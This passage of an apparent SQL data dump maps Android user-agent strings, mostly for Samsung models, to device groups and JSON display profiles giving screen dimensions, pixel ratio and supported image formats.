Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M317F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N986U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-T510) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-03L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-04L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SC-41A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SCV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SCV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SCV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SCV45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-02M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-04L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-51A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":792,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-M12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SH-RM12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHARK KLE-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHV44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHV45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SHV46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SILVER_MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SKR-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SKY_55_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A013F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A013G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A013M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A015F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A015M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A015T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A015V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A022F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A022G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A022M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A025F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A025M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A102U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A102W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A115M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A115U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A125M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A205YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 